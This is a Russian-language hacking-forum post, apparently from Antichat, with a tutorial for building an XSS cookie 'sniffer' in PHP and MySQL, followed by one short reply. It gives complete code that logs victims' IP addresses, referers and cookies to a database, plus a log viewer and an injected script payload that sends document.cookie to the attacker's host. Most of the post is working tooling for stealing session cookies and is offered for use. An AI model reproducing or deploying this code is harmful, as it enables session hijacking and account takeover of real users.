Введение При изучении атак вида XSS я столкнулся с проблемой - у меня небыло снифера. Я искал готовый снифер в интернете, но ничего дельного не нашел. Пообщавшись с юзерами античата мне дали дельный совет - снифер лутьше написать самому. Я так и сделал. Писал на php+mysql. Начнем Для начала создадим базу данных с именем sniffer а после таблицу data Сразу после этого напишем config.php PHP: <?php $dbhost = "database"; $dbuser = "login"; $dbpass = "password"; $dbname = "sniffer"; $db = @mysql_connect($dbhost, $dbuser, $dbpass); if (!$db) { exit ("<P>Сервер базы данных не доступен</P>" ); } if (!@mysql_select_db($dbname, $db)) { exit( "<P>База данных $dbname не доступна</P>" ); } ?> ps требует редактирования Теперь создаем snif.php PHP: <html> <head> <title>Sniffer _Pantera_ for Antichat</title> </head> <body> <? $ip = UrlDecode(getenv('REMOTE_ADDR')); $referer = UrlDecode(getenv('HTTP_REFERER')); $qu = UrlDecode(getenv('QUERY_STRING')); $cookie=getenv('HTTP_COOKIE'); require_once("config.php"); $query = "INSERT INTO `data` VALUES(NULL, '$ip', '$referer','$qu','$cookie')"; mysql_query($query, $db); mysql_close($db); ?> </body> </html> ps Именно он будет добавлять записи в базу данных. Теперь создадим .htaccess: ps В папку с снифером поместите любой gif рисунок и переименуйте его в image.gif И наконец создаем log.php PHP: <html> <head> <title>Снифер _Pantera_ for Antichat</title> </head> <body> <?php include('config.php'); $query = "SELECT * FROM `data` ORDER by `id` DESC"; $result = mysql_query($query); while($perem = mysql_fetch_array($result)) { echo "<TABLE WIDTH=100% BORDER=1><DIV style='margin-bottom: 15;'> <tr><td WIDTH=15% bgcolor=#FFCC33><center>ip</center></td><td>".$perem['ip']."</td></tr> <tr><td WIDTH=15% bgcolor=#FFCC33><center>referer</center></td><td>".$perem['referer']."</td></tr> <tr><td WIDTH=15% bgcolor=#FFCC33><center>query</center></td><td>".$perem['qu']."</td></tr> <tr><td WIDTH=15% bgcolor=#FFCC33><center>cookie</center></td><td>".$perem['cookie']."</td></tr></table>"; } ?> </body> </html> ps Этот файл будет считывать данные из базы данных и выводить их на экран в обратном порядке. Ну вот собственно и все. Осталось теперь залить эти все файлы на хостинг с поддержкой php+mysql и использовать. Использовние Простой вызов по ссылке: <a href="http://site.ru/image.gif?test">жми тут</a> Вызов как картинки: <img src="http://site.ru/image.gif"> Вызов из скрипта: <script>img = new Image(); img.src = "http://site.ru/image.gif?"+document.cookie;</script> ЗаключениеХочу сказать парочку слов в заключение. Снифер написал для себя, и оформил его по своему вкусу. Если вам он понравиться буду обновлять. Главное пишите каким бы вы его хотели видеть. C уважением _Pantera_ (С)
Ещё один..... куда их хоть столько, пип, юзаем каника и все в поряде, ..... плин один и тот-же куск кода в разной разметке =\ http://forum.antichat.ru/thread41026.html
